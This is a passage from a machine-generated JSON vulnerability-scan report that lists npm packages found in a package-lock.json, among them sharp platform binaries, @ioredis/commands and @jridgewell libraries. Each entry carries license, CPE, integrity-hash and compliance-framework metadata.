Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "34c9f7634c9fe393", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-wasm32 0.34.5", "title": "@img/sharp-wasm32 0.34.5", "description": "Package discovered: @img/sharp-wasm32 0.34.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ef4974ec29f2dcac", "name": "@img/sharp-wasm32", "version": "0.34.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0 AND LGPL-3.0-or-later AND MIT", "spdxExpression": "Apache-2.0 AND LGPL-3.0-or-later AND MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-wasm32:\\@img\\/sharp-wasm32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-wasm32:\\@img\\/sharp_wasm32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_wasm32:\\@img\\/sharp-wasm32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_wasm32:\\@img\\/sharp_wasm32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-wasm32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_wasm32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-wasm32@0.34.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-wasm32/-/sharp-wasm32-0.34.5.tgz", "integrity": "sha512-OdWTEiVkY2PHwqkbBI8frFxQQFekHaSSkUIJkwzclWZe64O1X4UlUjqqqLaPbUpMOQk6FBu/HtlGXNblIs0huw==", "dependencies": { "@emnapi/runtime": "^1.7.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "866d76b99aec49d7", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-win32-arm64 0.34.5", "title": "@img/sharp-win32-arm64 0.34.5", "description": "Package discovered: @img/sharp-win32-arm64 0.34.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b108eb8ed0a59806", "name": "@img/sharp-win32-arm64", "version": "0.34.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0 AND LGPL-3.0-or-later", "spdxExpression": "Apache-2.0 AND LGPL-3.0-or-later", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-win32-arm64:\\@img\\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-win32-arm64:\\@img\\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_win32_arm64:\\@img\\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_win32_arm64:\\@img\\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-win32-arm64@0.34.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-win32-arm64/-/sharp-win32-arm64-0.34.5.tgz", "integrity": "sha512-WQ3AgWCWYSb2yt+IG8mnC6Jdk9Whs7O0gxphblsLvdhSpSTtmu69ZG1Gkb6NuvxsNACwiPV6cNSZNzt0KPsw7g==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "574980068e294acc", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-win32-ia32 0.34.5", "title": "@img/sharp-win32-ia32 0.34.5", "description": "Package discovered: @img/sharp-win32-ia32 0.34.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "8da96e6bc654731f", "name": "@img/sharp-win32-ia32", "version": "0.34.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0 AND LGPL-3.0-or-later", "spdxExpression": "Apache-2.0 AND LGPL-3.0-or-later", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-win32-ia32:\\@img\\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-win32-ia32:\\@img\\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_win32_ia32:\\@img\\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_win32_ia32:\\@img\\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-win32-ia32@0.34.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-win32-ia32/-/sharp-win32-ia32-0.34.5.tgz", "integrity": "sha512-FV9m/7NmeCmSHDD5j4+4pNI8Cp3aW+JvLoXcTUo0IqyjSfAZJ8dIUmijx1qaJsIiU+Hosw6xM5KijAWRJCSgNg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ab5d55aa7d2a17c8", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-win32-x64 0.34.5", "title": "@img/sharp-win32-x64 0.34.5", "description": "Package discovered: @img/sharp-win32-x64 0.34.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e8052476c35410ff", "name": "@img/sharp-win32-x64", "version": "0.34.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0 AND LGPL-3.0-or-later", "spdxExpression": "Apache-2.0 AND LGPL-3.0-or-later", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-win32-x64:\\@img\\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-win32-x64:\\@img\\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_win32_x64:\\@img\\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_win32_x64:\\@img\\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-win32-x64@0.34.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-win32-x64/-/sharp-win32-x64-0.34.5.tgz", "integrity": "sha512-+29YMsqY2/9eFEiW93eqWnuLcWcufowXewwSNIT6UwZdUUCrM3oFjMWH/Z6/TMmb4hlFenmfAVbpWeup2jryCw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ab76bfe90efb399f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @ioredis/commands 1.5.1", "title": "@ioredis/commands 1.5.1", "description": "Package discovered: @ioredis/commands 1.5.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "58cb7ee4da366532", "name": "@ioredis/commands", "version": "1.5.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@ioredis\\/commands:\\@ioredis\\/commands:1.5.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40ioredis/commands@1.5.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@ioredis/commands/-/commands-1.5.1.tgz", "integrity": "sha512-JH8ZL/ywcJyR9MmJ5BNqZllXNZQqQbnVZOqpPQqE1vHiFgAw4NHbvE0FOduNU8IX9babitBT46571OnPTT0Zcw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2bd603d91182e49c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @isaacs/cliui 8.0.2", "title": "@isaacs/cliui 8.0.2", "description": "Package discovered: @isaacs/cliui 8.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "1157d16cad8b2ffc", "name": "@isaacs/cliui", "version": "8.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@isaacs\\/cliui:\\@isaacs\\/cliui:8.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40isaacs/cliui@8.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", "dependencies": { "string-width": "^5.1.2", "string-width-cjs": "npm:string-width@^4.2.0", "strip-ansi": "^7.0.1", "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", "wrap-ansi": "^8.1.0", "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "5c9bb2e998c9fa3b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @jridgewell/gen-mapping 0.3.13", "title": "@jridgewell/gen-mapping 0.3.13", "description": "Package discovered: @jridgewell/gen-mapping 0.3.13", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "93582717df76767f", "name": "@jridgewell/gen-mapping", "version": "0.3.13", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@jridgewell\\/gen-mapping:\\@jridgewell\\/gen-mapping:0.3.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/gen-mapping:\\@jridgewell\\/gen_mapping:0.3.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/gen_mapping:\\@jridgewell\\/gen-mapping:0.3.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/gen_mapping:\\@jridgewell\\/gen_mapping:0.3.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/gen:\\@jridgewell\\/gen-mapping:0.3.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@jridgewell\\/gen:\\@jridgewell\\/gen_mapping:0.3.13:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40jridgewell/gen-mapping@0.3.13", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.13.tgz", "integrity": "sha512-2kkt/7niJ6MgEPxF0bYdQ6etZaA+fQvDcLKckhy1yIQOzaoKjBBjSj63/aLVjYE3qhRt5dvM+uUyfCg6UKCBbA==", "dependencies": { "@jridgewell/sourcemap-codec": "^1.5.0", "@jridgewell/trace-mapping": "^0.3.24" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "843924b3be64bc5f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @jridgewell/resolve-uri 3.1.2", "title": "@jridgewell/resolve-uri 3.1.2", "description": "Package discovered: @jridgewell/resolve-uri 3.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "82452eb5459f3fba", "name": "@jridgewell/resolve-uri", "version": "3.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@jridgewell\\/resolve-uri:\\@jridgewell\\/resolve-uri:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": 